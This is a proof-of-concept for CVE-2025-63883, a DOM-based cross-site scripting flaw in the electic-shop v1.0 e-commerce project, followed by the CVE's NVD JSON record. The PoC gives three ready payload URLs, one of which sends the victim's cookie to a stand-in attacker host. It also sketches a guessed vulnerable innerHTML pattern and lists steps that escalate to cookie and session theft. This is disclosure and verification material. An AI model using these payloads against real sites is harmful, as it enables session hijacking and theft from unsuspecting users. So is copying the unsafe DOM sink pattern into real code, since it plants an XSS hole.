CVE-2025-63883

// DOM-based XSS PoC for CVE-2025-63883 // electic-shop v1.0 (Bhabishya-123/E-commerce) // Method 1: Using URL hash fragment // Attacker crafts a URL like: const pocUrl1 = 'http://target-electic-shop.com/page.html#<script>alert(document.cookie)</script>'; // Method 2: Using URL parameters const pocUrl2 = 'http://target-electic-shop.com/page.html?search=<img src=x onerror=alert(document.domain)>'; // Method 3: Using specific vulnerable parameter // If the vulnerable code reads from 'ref' parameter: const pocUrl3 = 'http://target-electic-shop.com/page.html?ref=<svg onload=fetch("https://attacker.com/steal?c="+document.cookie)>'; // Example vulnerable code pattern (what the application likely has): /* // Vulnerable JavaScript code in electic-shop: const params = new URLSearchParams(window.location.hash.slice(1)); const userInput = params.get('data'); // Unsafe sink usage: document.getElementById('output').innerHTML = userInput; // or document.write(userInput); // or element.insertAdjacentHTML('beforeend', userInput); */ // Recommended verification steps: // 1. Identify the vulnerable page and parameter // 2. Inject basic payload: <script>alert('XSS')</script> // 3. If alert triggers, confirm vulnerability // 4. Escalate to cookie/localStorage theft or session hijacking

{"cve": {"id": "CVE-2025-63883", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:36.097", "lastModified": "2026-02-04T20:42:48.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A DOM-based cross-site scripting vulnerability exists in electic-shop v1.0 (Bhabishya-123/E-commerce). The site's client-side JavaScript reads attacker-controlled input (for example, values derived from the URL or page fragment) and inserts it into the DOM via unsafe sinks (innerHTML/insertAdjacentHTML/document.write) without proper sanitization or context-aware encoding. An attacker can craft a malicious URL that, when opened by a victim, causes arbitrary JavaScript to execute in the victim's browser under the electic-shop origin."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bhabishya-123:e-commerce:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "90D50823-AA94-4347-9B60-7D06EB491E97"}]}]}], "references": [{"url": "https://github.com/minhajultaivin/security-advisories/blob/main/CVE-2025-63883.md", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}